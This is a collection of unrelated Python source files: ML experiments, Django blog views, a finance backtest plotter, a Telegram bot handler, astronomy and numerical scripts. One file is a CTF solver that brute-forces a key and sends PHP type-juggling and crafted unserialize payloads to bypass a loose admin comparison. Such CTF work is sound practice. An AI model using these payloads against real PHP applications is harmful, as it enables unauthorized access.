                        if X2_tmp[k * 4] == 1:
                            print('A', end='')
                        elif X2_tmp[k * 4 + 1] == 1:
                            print('C', end='')
                        elif X2_tmp[k * 4 + 2] == 1:
                            print('G', end='')
                        else:
                            print('T', end='')
                    print(' ', end='\n')
            for j in range(batch_size):
                # if FNs[j] == True:
                if False:
                    fp_ind = i * batch_size + j
                    print("FN 1 @ %d" % fp_ind)
                    X1_tmp = X1s[j]
                    for k in range(100):
                        if X1_tmp[k * 4] == 1:
                            print('A', end='')
                        elif X1_tmp[k * 4 + 1] == 1:
                            print('C', end='')
                        elif X1_tmp[k * 4 + 2] == 1:
                            print('G', end='')
                        else:
                            print('T', end='')
                    print(' ', end='\n')
                    X2_tmp = X2s[j]
                    for k in range(100):
                        if X2_tmp[k * 4] == 1:
                            print('A', end='')
                        elif X2_tmp[k * 4 + 1] == 1:
                            print('C', end='')
                        elif X2_tmp[k * 4 + 2] == 1:
                            print('G', end='')
                        else:
                            print('T', end='')
                    print(' ', end='\n')
        test_accuracy /= batch_num
        print("test accuracy %g" % test_accuracy)
        print("#FPs: %g" % total_FP)
        print("#FNs: %g" % total_FN)
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--data_dir', type=str,
                        default='/tmp/tensorflow/mnist/input_data',
                        help='Directory for storing input data')
    FLAGS, unparsed = parser.parse_known_args()
    # tf.app.run re-invokes main() after flag parsing, forwarding leftover args.
    tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
|
'''
Problem
A partial permutation is an ordering of only k objects taken from a collection containing n objects (i.e., k<=n).
For example, one partial permutation of three of the first eight positive integers is given by (5,7,2).
The statistic P(n,k) counts the total number of partial permutations of k objects that can be formed from a collection of n objects.
Note that P(n,n) is just the number of permutations of n objects, which we found to be equal to n!=n(n-1)(n-2)...(3)(2) in "Enumerating Gene Orders".
Given: Positive integers n and k such that 100>=n>0 and 10>=k>0.
Return: The total number of partial permutations P(n,k), modulo 1,000,000.
Sample Dataset
21 7
Sample Output
51200
'''
import math
def binomial_coefficient(n, k):
    """Return C(n, k) exactly via the multiplicative formula.

    Fixes the original Python 2 code: `xrange` does not exist in
    Python 3, and true division `/` would produce floats there. Floor
    division is exact at every step because the running product of i
    consecutive integers is divisible by i!.
    """
    res = 1
    for i in range(1, k + 1):
        res = res * (n - i + 1) // i
    return res
# Read "n k" from in.txt and print P(n, k) = C(n, k) * k! modulo 1,000,000.
# Fixes: Python 2 `print` statement (syntax error in Python 3) and the
# leaked file handle (now closed via a context manager).
with open('in.txt', 'r') as f:
    n, k = [int(x) for x in f.readline().strip().split(' ')]
print(binomial_coefficient(n, k) * math.factorial(k) % 1000000)
|
import numpy as np
from mnist import MNIST
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
from sklearn.neighbors import NearestNeighbors
from sklearn.preprocessing import normalize
import imageio
# Module display_nerwork help us hiển thị nhiều bức ảnh các chữ số cùng một lúc
from display_network import *
# Load the MNIST test split and keep the first 1000 images, scaled to [0, 1).
mndata = MNIST('./MNIST/')
mndata.load_testing()
X = mndata.test_images
print(X[0])
X0 = np.asarray(X)[:1000, :]/256.0
X = X0
print(X)
# Cluster into K=10 groups (one hoped-for cluster per digit).
K = 10
kmeans = KMeans(n_clusters=K).fit(X)
pred_label = kmeans.predict(X)
print(type(kmeans.cluster_centers_.T))
print(kmeans.cluster_centers_.T.shape)
# Show the 10 cluster centroids as images.
A = display_network(kmeans.cluster_centers_.T, K, 1)
f1 = plt.imshow(A, interpolation='nearest', cmap="jet")
f1.axes.get_xaxis().set_visible(False)
f1.axes.get_yaxis().set_visible(False)
plt.show()
# a colormap and a normalization instance
cmap = plt.cm.jet
norm = plt.Normalize(vmin=A.min(), vmax=A.max())
# map the normalized data to colors
# image is now RGBA
image = cmap(norm(A))
imageio.imwrite('mnist_clustering.png', image)
print(type(pred_label))
print(pred_label.shape)
print(type(X0))
# For each cluster, collect the N0 members nearest its centroid (X1) and
# the first N0 members in data order (X2).
N0 = 20
X1 = np.zeros((N0*K, 784))
X2 = np.zeros((N0*K, 784))
for k in range(K):
    Xk = X0[pred_label == k, :]
    center_k = [kmeans.cluster_centers_[k]]
    # NOTE(review): positional n_neighbors is deprecated in newer sklearn
    # (use NearestNeighbors(n_neighbors=N0)).
    neigh = NearestNeighbors(N0).fit(Xk)
    dist, nearest_id = neigh.kneighbors(center_k, N0)
    # NOTE(review): nearest_id is shaped (1, N0); Xk[nearest_id, :] yields a
    # 3-D array, so this assignment relies on broadcasting — verify against
    # the numpy version in use. X1 is also never displayed below.
    X1[N0*k: N0*k + N0, :] = Xk[nearest_id, :]
    X2[N0*k: N0*k + N0, :] = Xk[:N0, :]
# Show N0 sample images per cluster (grayscale).
plt.axis('off')
A = display_network(X2.T, K, N0)
f2 = plt.imshow(A, interpolation='nearest')
plt.gray()
plt.show()
|
from django.http.response import HttpResponse
from django.shortcuts import get_object_or_404, redirect, render
from django.urls import reverse
from django.db.models import Q
from .models import Category, Post
from comments.models import *
from .forms import *
from comments.forms import *
from FinalBlog.settings import MEDIA_ROOT
import os
from dashboard.forms import PostsForm
# from django.contrib.auth.decorators import login_required
# Create your views here.
def home(request):
    """List posts, optionally filtered by a ?category=<name> query param.

    Fix: removed leftover debug code that fetched a hard-coded post
    (slug "laravellaravel") and printed its categories — it raised
    Post.DoesNotExist and broke the whole view whenever that slug was
    absent from the database.
    """
    categories = Category.objects.all()
    if 'category' in request.GET and categories.filter(name=request.GET['category']):
        posts = Post.objects.filter(categories__name=request.GET['category'])
    else:
        # Default listing: newest first.
        posts = Post.objects.all().order_by('-publish')
    context = {
        "posts": posts,
        "categories": categories
    }
    return render(request, 'posts/home.html', context)
def detail(request, slug):
    """Render one post with its top-level comments, the current user's
    like/dislike state, and an empty comment form."""
    post = get_object_or_404(Post, slug=slug)
    username = request.user.username
    context = {
        "post": post,
        # Only root comments; replies hang off their parents in the template.
        "comments": post.comments.filter(parent__isnull=True),
        "is_liked": post.likes.filter(username=username).exists(),
        "is_disliked": post.dislikes.filter(username=username).exists(),
        "comment_form": commentForm(),
    }
    return render(request, 'posts/detail.html', context)
def search(request):
    """Search posts by title or content substring.

    Fix: use `request.GET.get('search', '')` instead of direct indexing,
    which raised KeyError (HTTP 500) when the query parameter was missing.
    """
    field = request.GET.get('search', '')
    posts = Post.objects.filter(Q(title__icontains=field) | Q(
        content__icontains=field))  # change it to tags later
    categories = Category.objects.all()
    context = {
        "posts": posts,
        "categories": categories
    }
    return render(request, 'posts/home.html', context)
def like(request, slug, is_liked):
    """Toggle the current user's like/dislike on a post.

    `is_liked` arrives as the string "True"/"False" from the URL. When the
    user already liked the post, the vote is flipped to a dislike, and vice
    versa. NOTE(review): a post is permanently deleted once it accumulates
    10 dislikes — confirm this is intended moderation behavior. Removing a
    user who is not in the m2m set is a harmless no-op in Django.
    """
    post = get_object_or_404(Post, slug=slug)
    if is_liked == "True":
        post.likes.remove(request.user)
        post.dislikes.add(request.user)
    else:
        post.likes.add(request.user)
        post.dislikes.remove(request.user)
    if post.dislikes.count() >= 10:
        post.delete()
        return redirect('posts:home')
    return redirect(reverse('posts:detail', kwargs={"slug": slug}))
def subscribe(request, id):
    """Placeholder — subscription flow is not implemented yet."""
    return None
# @login_required
def create(request):
    """Create a new post from PostsForm and attach its categories.

    Staff authors are sent back to the dashboard, everyone else to the
    public post list. GET (or invalid POST) re-renders the form.
    """
    form = PostsForm(request.POST or None, request.FILES or None)
    if request.method == 'POST' and form.is_valid():
        post = Post(title=form.cleaned_data['title'], content=form.cleaned_data['content'] , image=form.cleaned_data['image'])
        post.user = request.user
        # Post must be saved before m2m categories can be attached.
        post.save()
        for id in form.cleaned_data['categories']:
            category = get_object_or_404(Category, id=int(id))
            post.categories.add(category)
        if request.user.is_staff:
            return redirect('dashboard:home')
        return redirect('posts:home')
    context = {
        "form": form
    }
    return render(request, "posts/create.html", context)
def edit(request, slug):
    """Edit an existing post; only its author may do so.

    On a successful POST the old image file is deleted from MEDIA_ROOT when
    a different image was uploaded, the post fields are updated, and the
    submitted categories are (re-)attached.
    """
    post = get_object_or_404(Post, slug=slug)
    # Guard: non-authors are bounced back to the detail page.
    if request.user != post.user:
        return redirect(reverse('posts:detail', kwargs={'slug': slug}))
    form = PostsForm(request.POST or None, request.FILES or None, initial={
        "title": post.title,
        "content": post.content,
        "image": post.image,
        "categories": [ category.id for category in post.categories.all() ]
    })
    if request.method == 'POST' and form.is_valid():
        if post.image != form.cleaned_data["image"]:
            # NOTE(review): raises FileNotFoundError if the old file is
            # already gone from disk — confirm whether that can happen.
            os.remove(os.path.join(MEDIA_ROOT, f"{post.image}"))
        post.title=form.cleaned_data['title']
        post.content=form.cleaned_data['content']
        post.image=form.cleaned_data['image']
        post.user = request.user
        post.save()
        # NOTE(review): categories are only added, never removed, so
        # deselected categories stay attached — confirm intent.
        for id in form.cleaned_data['categories']:
            category = get_object_or_404(Category, id=int(id))
            post.categories.add(category)
        return redirect(reverse('posts:detail', kwargs={"slug":slug}))
    context = {
        "form": form,
        "slug": slug
    }
    return render(request, 'posts/edit.html', context)
def delete(request, slug):
    """Delete a post; only its author is allowed to."""
    post = get_object_or_404(Post, slug=slug)
    if request.user == post.user:
        post.delete()
        return redirect('posts:home')
    # Anyone else is bounced back to the post's detail page.
    return redirect(reverse('posts:detail', kwargs={'slug': slug}))
import requests
import hashlib
import re
# CTF exploit script (Python 2 -- note the print statements): brute-forces
# key1, then chains each further challenge parameter onto the URL.
url = "https://sec-army.ml/fatherphp/fatherphp.php?key1="
s= requests.session()
d = "1"
# Brute-force key1 over a numeric range (negative values included).
for d in range(-1000,100):
    #print d
    r= s.get(url + str(d))
    if "secarmy" in r.content:
        # Correct key1 found -- the response contains the marker string.
        print r.content
        print d
        url2 = url + str(d)
        # key2 must equal 8; the PHP expression 1e1-2 == 8 (10 - 2).
        r1 = s.get(url2 + "&" + "key2=1e1-2")
        print r1.content
        # fp must be md5("rq") = c6d8c86cf807f3f3b38850342d1531b3
        md5value = "rq"
        h = hashlib.md5(md5value.encode())
        fd = h.hexdigest()
        url3 = str(url2 + "&" + "rq=rq" + "&" + "key2=1e1-2" + "&" + 'fp='+ fd)
        #print url3
        r3 = s.get(url3)
        #print r3.content
        # np = ripemd160("'np'"), precomputed with the PHP CLI:
        #   php > $n = hash('ripemd160',"'np'");
        #   php > echo $n;
        #   6b8e49d76469a9c097976a8940983f8992c8fabc
        ns = "6b8e49d76469a9c097976a8940983f8992c8fabc"
        url4 = str(url3 + "&" + 'np=' + ns)
        r4 = s.get(url4)
        print r4.content
        print url4
        # key3 is unserialize()d server-side; PHP's loose comparison lets the
        # double 0 (d:0) "==" both $adminName and $adminPassword:
        #   $data = unserialize($hell);  // a:2 means a two-entry array
        #   if ($data['username'] == $adminName && $data['password'] == $adminPassword) {
        #       echo $flag5 . "<br>";
        #   } else { die("useless"); }
        unserialize = "a:2:{s:8:" + '"' + "username" + '"' + ";d:0;s:8:" + '"' + "password" + '"' + ";d:0;}"
        url5 = str(url4 + "&" + "key3=" + unserialize)
        r5 = s.get(url5)
        # Extract the flag fragments from the response markup.
        ft=(r5.content).split('\n')
        f=ft[3].split('<br>')
        print f[1]+f[3]+f[4]+f[5]
        break
#!/usr/bin/env python3
# coding: utf-8
""" Functions to plot backtest. """
# Built-in packages
# External packages
import numpy as np
from matplotlib import pyplot as plt
import seaborn as sns
# Internal packages
from fynance.features.money_management import iso_vol
from fynance.features.metrics import drawdown, roll_sharpe
from fynance.backtest.print_stats import set_text_stats
# Set plot style
plt.style.use('seaborn')
__all__ = ['display_perf']
# =========================================================================== #
# Printer Tools #
# =========================================================================== #
def compute_perf(logret, signal, fee):
    """Cumulative performance of a signal-driven strategy net of switching fees.

    A fee proportional to the change in position is charged at each switch;
    the signed difference (not its absolute value) is intentional: combined
    with the final multiplication by `signal`, it charges fees correctly for
    both long and short entries.
    """
    fees = np.zeros(logret.shape)
    fees[1:] = np.diff(signal) * fee
    simple_ret = np.exp(logret) - 1.0 - fees
    return np.cumprod(1.0 + simple_ret * signal)
def display_perf(
    y_idx, y_est, period=252, title='', params_iv=None,
    plot_drawdown=True, plot_roll_sharpe=True, x_axis=None,
    underlying='Underlying', win=252, fees=0,
):
    """ Plot performance and print KPI of backtest.

    Print dynamic plot of performance indicators (perf, rolling sharpe
    and draw down) of a strategy (raw and iso-volatility) versus its
    underlying.

    Parameters
    ----------
    y_idx : np.ndarray[np.float64, ndim=1]
        Time series of log-returns of the underlying.
    y_est : np.ndarray[np.float64, ndim=1]
        Time series of the signal's strategy.
    period : int, optional
        Number of period per year. Default is 252.
    title : str or list of str, optional
        Title of performance strategy, default is empty.
    params_iv : dict, optional
        Extra keyword arguments forwarded to ``iso_vol``. Default is None
        (no extra arguments).
    plot_drawdown : bool, optional
        If true plot drawdowns, default is True.
    plot_roll_sharpe : bool, optional
        If true plot rolling sharpe ratios, default is True.
    x_axis : list or np.asarray, optional
        x-axis to plot (e.g. list of dates).
    underlying : str, optional
        Name of the underlying, default is 'Underlying'.
    win : int, optional
        Size of the window of rolling sharpe, default is 252.
    fees : float, optional
        Fees to apply at the strategy performance.

    Returns
    -------
    perf_idx : np.ndarray[np.float64, ndim=1]
        Time series of underlying performance.
    perf_est : np.ndarray[np.float64, ndim=1]
        Time series of raw strategy performance.
    perf_ivo : np.ndarray[np.float64, ndim=1]
        Time series of iso-vol strategy performance.

    See Also
    --------
    PlotBackTest, set_text_stats

    """
    # Fix: `params_iv=None` replaces the original mutable default `{}`.
    if params_iv is None:
        params_iv = {}
    if x_axis is None:
        x_axis = range(y_idx.size)

    # Compute performances: underlying, raw strategy and iso-vol strategy.
    perf_idx = np.exp(np.cumsum(y_idx))
    perf_est = compute_perf(y_idx, y_est, fees)
    iv = iso_vol(np.exp(np.cumsum(y_idx)), **params_iv)
    perf_ivo = compute_perf(y_idx, y_est * iv, fees)

    # Print stats table.
    txt = set_text_stats(
        y_idx, period=period,
        Strategy=y_est,
        Strat_IsoVol=y_est * iv,
        underlying=underlying,
        fees=fees
    )
    print(txt)

    # One, two or three stacked axes depending on the plot flags.
    n = 1 + plot_roll_sharpe + plot_drawdown
    f, ax = plt.subplots(n, 1, figsize=(9, 6), sharex=True)

    if n == 1:
        # Bug fix: the original unpacked `ax_perf, ax_dd, ax_dd`, leaving
        # `ax_roll` unbound (harmless only because both flags are False here).
        ax_perf, ax_dd, ax_roll = ax, None, None
        ax_perf.set_xlabel('Date')

    elif n == 2:
        ax_perf = ax[0]
        (ax_dd, ax_roll) = (ax[1], None) if plot_drawdown else (None, ax[1])
        ax[-1].set_xlabel('Date')

    else:
        ax_perf, ax_dd, ax_roll = ax[0], ax[1], ax[2]

    # Plot performances. Bug fix: matplotlib line kwargs are case sensitive --
    # the original `LineWidth=` is not a valid property; use `linewidth=`.
    ax_perf.plot(
        x_axis,
        100 * perf_est,
        color=sns.xkcd_rgb["pale red"],
        linewidth=2.
    )
    ax_perf.plot(
        x_axis,
        100 * perf_ivo,
        color=sns.xkcd_rgb["medium green"],
        linewidth=1.8
    )
    ax_perf.plot(
        x_axis,
        100 * perf_idx,
        color=sns.xkcd_rgb["denim blue"],
        linewidth=1.5
    )

    # Mouse-motion callback: refresh the legends with the values under the cursor.
    def motion(event):
        N = len(ax_perf.lines[0].get_ydata())
        w, h = f.get_size_inches() * f.dpi - 200
        x = max(event.x - 100, 0)
        # Fix: clamp the index so a cursor at the far right cannot overflow.
        j = min(int(x / w * N), N - 1)
        ax_perf.legend([
            'Strategy: {:.0f} %'.format(ax_perf.lines[0].get_ydata()[j] - 100),
            'Strat Iso-Vol: {:.0f} %'.format(ax_perf.lines[1].get_ydata()[j] - 100),
            '{}: {:.0f} %'.format(underlying, ax_perf.lines[2].get_ydata()[j] - 100),
        ], loc='upper left', frameon=True, fontsize=10)
        if plot_drawdown:
            ax_dd.legend([
                'Strategy: {:.2f} %'.format(ax_dd.lines[0].get_ydata()[j]),
                'Strat Iso-Vol: {:.2f} %'.format(ax_dd.lines[1].get_ydata()[j]),
                '{}: {:.2f} %'.format(underlying, ax_dd.lines[2].get_ydata()[j]),
            ], loc='upper left', frameon=True, fontsize=10)
        if plot_roll_sharpe:
            ax_roll.legend([
                'Strategy: {:.2f}'.format(ax_roll.lines[0].get_ydata()[j]),
                'Strat Iso-Vol: {:.2f}'.format(ax_roll.lines[1].get_ydata()[j]),
                '{}: {:.2f}'.format(underlying, ax_roll.lines[2].get_ydata()[j]),
            ], loc='upper left', frameon=True, fontsize=10)

    ax_perf.legend(
        ['Strategy', 'Strat Iso-Vol', underlying],
        loc='upper left', frameon=True, fontsize=10
    )
    ax_perf.set_ylabel('Perf.')
    ax_perf.set_yscale('log')
    ax_perf.set_title(title)
    ax_perf.tick_params(axis='x', rotation=30, labelsize=10)

    # Plot drawdowns.
    if plot_drawdown:
        ax_dd.plot(
            x_axis,
            100 * drawdown(perf_est),
            color=sns.xkcd_rgb["pale red"],
            linewidth=1.4
        )
        ax_dd.plot(
            x_axis,
            100 * drawdown(perf_ivo),
            color=sns.xkcd_rgb["medium green"],
            linewidth=1.2
        )
        ax_dd.plot(
            x_axis,
            100 * drawdown(perf_idx),
            color=sns.xkcd_rgb["denim blue"],
            linewidth=1.
        )
        ax_dd.set_ylabel('% DrawDown')
        ax_dd.set_title('DrawDown in percentage')
        ax_dd.tick_params(axis='x', rotation=30, labelsize=10)

    # Plot rolling Sharpe ratio.
    if plot_roll_sharpe:
        ax_roll.plot(
            x_axis,
            roll_sharpe(perf_est, period=period, w=win),
            color=sns.xkcd_rgb["pale red"],
            linewidth=1.4
        )
        ax_roll.plot(
            x_axis,
            roll_sharpe(perf_ivo, period=period, w=win),
            color=sns.xkcd_rgb["medium green"],
            linewidth=1.2
        )
        ax_roll.plot(
            x_axis,
            roll_sharpe(perf_idx, period=period, w=win),
            color=sns.xkcd_rgb["denim blue"],
            linewidth=1.
        )
        ax_roll.set_ylabel('Sharpe ratio')
        ax_roll.set_yscale('log')
        ax_roll.set_xlabel('Date')
        ax_roll.set_title('Rolling Sharpe ratio')
        ax_roll.tick_params(axis='x', rotation=30, labelsize=10)

    f.canvas.mpl_connect('motion_notify_event', motion)
    plt.show()

    return perf_idx, perf_est, perf_ivo
|
#!/usr/bin/env python
from SimpleHTTPServer import SimpleHTTPRequestHandler
from BaseHTTPServer import HTTPServer
from urlparse import urlparse, parse_qs
import cgi
PORT=5003

class TracerHandler(SimpleHTTPRequestHandler):
    """Tiny Python 2 logging endpoint: prints posted 'trace' payloads to stdout.

    NOTE(review): `container` is a class-level dict, so the request counter is
    shared across requests (each request gets a fresh handler instance).
    """
    container={'k':0};
    def do_GET(self):
        #self.send_response(200)
        # Parse the request body according to its declared content type.
        ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
        if ctype == 'multipart/form-data':
            postvars = cgi.parse_multipart(self.rfile, pdict)
        elif ctype == 'application/x-www-form-urlencoded':
            length = int(self.headers.getheader('content-length'))
            postvars = cgi.parse_qs(self.rfile.read(length), keep_blank_values=1)
        else:
            postvars = {}
        if 'trace' in postvars.keys():
            # Count the trace and dump it together with the sender's 'name'.
            self.container['k'] += 1
            print str(self.container['k'])+' - '+str(postvars['name'].pop())
            print '---------------------'
            print '\n'
            print postvars['trace'].pop()
            print '\n'
            print '---------------------'
        self.wfile.write('Logger')
        return
    def do_POST(self):
        # POST is handled identically to GET.
        self.do_GET()
        return
        #self.send_response(200)

httpd = HTTPServer(("", PORT), TracerHandler)
print "PicPay Tracer", PORT
httpd.serve_forever()
#!/usr/bin/env python3
def main():
    """Read test cases from stdin and print names ordered by their class list.

    Per test case: a count, then that many lines of the form
    ``<name> <cls1>-<cls2>-... <ignored>`` (format inferred from the
    parsing below -- confirm against the problem statement).
    """
    for _ in range(int(input())):
        people = []
        for _ in range(int(input())):
            name, classes, _ = input().split()
            # Keep the ordinal of each class token's first character.
            classes = [ord(c[0]) for c in classes.split("-")]
            # name[:-1] drops a trailing separator character (presumably ':').
            # Reverse the class list and pad with 109 -- ord('m'), apparently a
            # sentinel sorting short lists consistently; TODO confirm intent.
            people.append((name[:-1], classes[::-1]
                + [109 for _ in range(10 - len(classes))]))
        # Stable sorts: alphabetical first, then by class list descending,
        # so ties in the class list stay alphabetical.
        people.sort(key=lambda p: p[0])
        people.sort(key=lambda p: p[1], reverse=True)
        print("\n".join(map(lambda x: x[0], people)))
        print("==============================")

if __name__ == '__main__':
    main()
|
import logging
import re
# noinspection PyPackageRequirements
from telegram.ext import (
CommandHandler,
MessageHandler,
ConversationHandler,
Filters
)
from bot import stickersbot
from .packs import create
from .stickers import add
from .conversation_statuses import Status
from .fallback_commands import cancel_command, on_timeout
from .fallback_commands import STANDARD_CANCEL_COMMANDS
from ..customfilters import CustomFilters
logger = logging.getLogger(__name__)
# Register the "create pack / add sticker" conversation on the bot dispatcher.
# persistent=True: the conversation's state survives bot restarts.
stickersbot.add_handler(ConversationHandler(
    name='create_or_add',
    persistent=True,
    entry_points=[
        # CREATE
        CommandHandler(['create', 'new'], create.on_create_static_pack_command),
        # ADD
        CommandHandler(['add', 'a'], add.on_add_command)
    ],
    states={
        # CREATE: ask for the new pack's title, then its name, then its first sticker.
        Status.CREATE_WAITING_TITLE: [
            MessageHandler(Filters.text & ~Filters.command(STANDARD_CANCEL_COMMANDS), create.on_pack_title_receive),
            MessageHandler(~Filters.text, create.on_waiting_title_invalid_message)
        ],
        Status.CREATE_WAITING_NAME: [
            MessageHandler(Filters.text & ~Filters.command(STANDARD_CANCEL_COMMANDS), create.on_pack_name_receive),
            MessageHandler(~Filters.text, create.on_waiting_name_invalid_message)
        ],
        Status.CREATE_WAITING_FIRST_STICKER: [
            MessageHandler(Filters.text & ~Filters.command, create.on_first_sticker_text_receive),  # in case the user sends the emojis
            # this handler is shared by both static and animated stickers
            MessageHandler(Filters.sticker | CustomFilters.png_file, create.on_first_sticker_receive),
            MessageHandler(~Filters.text, create.on_waiting_first_sticker_invalid_message)
        ],
        # ADD: ask which existing pack to add to (title, then name).
        Status.ADD_WAITING_TITLE: [
            MessageHandler(~Filters.text, add.on_waiting_title_invalid_message),
            MessageHandler(Filters.text & ~Filters.command(STANDARD_CANCEL_COMMANDS), add.on_pack_title)
        ],
        Status.ADD_WAITING_NAME: [
            MessageHandler(~Filters.text, add.on_waiting_name_invalid_message),
            MessageHandler(Filters.text & ~Filters.command(STANDARD_CANCEL_COMMANDS), add.on_pack_name)
        ],
        # SHARED (ADD): keep receiving stickers until the user cancels.
        Status.WAITING_STATIC_STICKERS: [
            MessageHandler(Filters.text & ~Filters.command, add.on_text_receive),  # in case the user sends the emojis
            MessageHandler(CustomFilters.static_sticker_or_png_file, add.on_static_sticker_receive),
            MessageHandler(CustomFilters.animated_sticker, add.on_bad_static_sticker_receive),
            # for everything that is not caught by the handlers above
            MessageHandler(Filters.all & ~Filters.command(STANDARD_CANCEL_COMMANDS), add.on_waiting_sticker_invalid_message)
        ],
        Status.WAITING_ANIMATED_STICKERS: [
            MessageHandler(Filters.text & ~Filters.command, add.on_text_receive),  # in case the user sends the emojis
            MessageHandler(CustomFilters.animated_sticker, add.on_animated_sticker_receive),
            MessageHandler(CustomFilters.static_sticker_or_png_file, add.on_bad_animated_sticker_receive),
            # for everything that is not caught by the handlers above
            MessageHandler(Filters.all & ~Filters.command(STANDARD_CANCEL_COMMANDS), add.on_waiting_sticker_invalid_message)
        ],
        # TIMEOUT: fires when the conversation expires.
        ConversationHandler.TIMEOUT: [MessageHandler(Filters.all, on_timeout)]
    },
    fallbacks=[CommandHandler(STANDARD_CANCEL_COMMANDS, cancel_command)],
    conversation_timeout=15 * 60  # expire an idle conversation after 15 minutes
))
'''VoidFinder - Hoyle & Vogeley (2002)'''
################################################################################
#
# IMPORT MODULES
#
################################################################################
from voidfinder import filter_galaxies, find_voids
from astropy.io import fits
from astropy.table import Table
from absmag_comovingdist_functions import Distance
################################################################################
#
# USER INPUTS
#
################################################################################
survey_name = 'DESI_mock_2_'

# File header
in_directory = ''
out_directory = '/scratch/mguzzett/VoidFinder/'

# Input file names
galaxies_filename = 'DESI_void_mock_2.fits'  # File format: RA, dec, redshift, comoving distance, absolute magnitude
mask_filename = 'void_2_mask.dat'  # File format: RA, dec

in_filename = in_directory + galaxies_filename
mask_filename = in_directory + mask_filename

# Output file names
out1_filename = out_directory + galaxies_filename[:-5] + '_maximal.txt'  # List of maximal spheres of each void region: x, y, z, radius, distance, ra, dec
out2_filename = out_directory + galaxies_filename[:-5] + '_holes.txt'  # List of holes for all void regions: x, y, z, radius, flag (to which void it belongs)
#out3_filename = out_directory + 'out3_vollim_dr7.txt'  # List of void region sizes: radius, effective radius, evolume, x, y, z, deltap, nfield, vol_maxhole
#voidgals_filename = out_directory + 'vollim_voidgals_dr7.txt'  # List of the void galaxies: x, y, z, void region

# Survey limits (comoving distance, presumably Mpc/h given the comment below)
min_dist = 0  # z = 0
max_dist = 2300.  # z = 0.7 --> 2388 Mpc/h

# Cosmology
Omega_M = 0.3
h = 1

################################################################################
#
# OPEN FILES
#
################################################################################
gal_file = fits.open(in_filename)
infile = Table(gal_file[1].data)
maskfile = Table.read(mask_filename, format='ascii.commented_header')

# Rename the magnitude column so downstream code finds 'rabsmag'.
if 'rabsmag' not in infile.columns:
    '''
    print(infile.columns)
    print('Please rename columns')
    exit()
    '''
    infile['magnitude'].name = 'rabsmag'

# Compute the comoving distance from redshift if it is not already present.
if 'Rgal' not in infile.columns:
    infile['Rgal'] = Distance(infile['z'], Omega_M, h)

################################################################################
#
# FILTER GALAXIES
#
################################################################################
coord_min_table, mask, ngrid = filter_galaxies(infile, maskfile, min_dist, max_dist, survey_name)

################################################################################
#
# FIND VOIDS
#
################################################################################
find_voids(ngrid, min_dist, max_dist, coord_min_table, mask, out1_filename, out2_filename, survey_name)
|
#SudokuPuzzle.py
# Adapted from SudokuData.py
#################
## sudokuPuzzle ##
#################
from select_error import SelectError
from SudokuData import SudokuData
class SudokuPuzzle(SudokuData):
    """A Sudoku puzzle: SudokuData plus a description and optional source file."""

    def __init__(self, desc=None, file_name=None, **kwargs):
        """
        :desc: description of the puzzle; defaults to "Basic Sudoku Puzzle"
        :file_name: file name, if known
        :kwargs: forwarded to SudokuData (grid dimensions etc.)
        """
        self.file_name = file_name
        if desc is None:
            # Bug fix: the original had a bare string literal here (a no-op),
            # so the description was never stored anywhere.
            desc = "Basic Sudoku Puzzle"
        self.desc = desc
        super(SudokuPuzzle, self).__init__(**kwargs)

    def add_cell(self, row=None, col=None, val=None):
        """ Add data square to puzzle
        :row: row number
        :col: column number
        :val: square number
        :raises SelectError: if any argument is missing
        """
        if row is None or col is None or val is None:
            raise SelectError(f" row, col and val must be specified row={row}, col={col}, val={val}")
        self.setCell(row=row, col=col, val=val)

    def file2puzzle(self, file=None):
        """ Convert file name/object to puzzle
        :file: name if string, else open file stream
        :returns: puzzle, None if failure
        """
        if isinstance(file, str):
            self.file_name = file
            # Bug fix: the original called file.splitlines() on the file
            # object itself (AttributeError) and never closed the file;
            # read the text first, and close via the context manager.
            with open(file) as f:
                puzzle_str = f.read().splitlines()
        else:
            puzzle_str = file.read().splitlines()
        return self.str2puzzle(puzzle_str)

    def copy(self):
        """ Copy puzzle to insulate changes in data
        :Returns: copy of data with new objects for cells
        """
        rows = self.nRow
        grows = self.nSubRow
        cols = self.nCol
        gcols = self.nSubCol
        cp = SudokuPuzzle(rows=rows, grows=grows,
                          cols=cols, gcols=gcols)
        for nr in range(1, rows+1):
            for nc in range(1, cols+1):
                val = self.getCellVal(row=nr, col=nc)
                if val is not None:
                    cp.add_cell(row=nr, col=nc, val=val)
        return cp
|
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
from pylab import *
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
import math
def laplace_iteration2_t(f,r,U_t,dr,dtheta,n,m):
    """One sweep of a line-relaxation solver for (r*u_t) on a polar grid.

    For every angular index j a (n+1)x(n+1) linear system is assembled from
    the radial finite-difference stencil and solved with least squares; the
    angular neighbours of column j enter through the forcing vector, with
    periodic wrap-around at j = 0 and j = m-1.

    NOTE(review): assumes f, r and U_t are arrays of shape (n+1, m) sampled
    on the (radius, angle) grid with spacings dr, dtheta -- confirm with caller.

    :f: current iterate, coupled through the angular neighbours
    :r: radius at each grid node
    :U_t: boundary data; only row n (outer radius) is read
    :returns: g, the updated (n+1, m) array of r*u_t values
    """
    n=int(n)
    m=int(m)
    g=np.zeros((n+1,m));
    for j in range(1,int(m-1)):  # interior angles j = 1 .. m-2
        ## Build the tridiagonal matrix A for this fixed j.
        A = np.zeros((n+1,n+1));
        for i in range(1,n):
            A[i,i-1] = (-1/(2*dr)+r[i,j]/(dr**2));
            A[i,i] = -2*(r[i,j]/dr**2 + 1/(r[i,j]*dtheta**2));
            A[i,i+1] = 1/(2*dr)+r[i,j]/dr**2;
        # Inner boundary row enforces g[0] - g[1] = 0.
        A[0,0] = 1;
        A[0,1] = -1;
        # Outer boundary row: identity; its value comes from U_t below.
        A[n,n] = 1;
        ## Build the forcing vector ff from the angular neighbours.
        ff=np.zeros((n+1,1));
        for i in range(1,n):
            ff[i] = -(f[i,j-1]+f[i,j+1])/(r[i,j]*dtheta**2);
        ff[n] = r[n,j]*U_t[n,j];  # exact value on the exterior boundary
        ## Solve for r*u_t along this radial line.
        g[:,j] = linalg.lstsq(A,ff)[0].reshape(n+1)
    ## j = 0: same system, wrapping to column m-1 for the left neighbour.
    A1 = np.zeros((n+1,n+1));
    for i in range(1,n):
        A1[i,i-1] = (-1/(2*dr)+r[i,0]/(dr**2));
        A1[i,i] = -2*(r[i,0]/dr**2 + 1/(r[i,0]*dtheta**2));
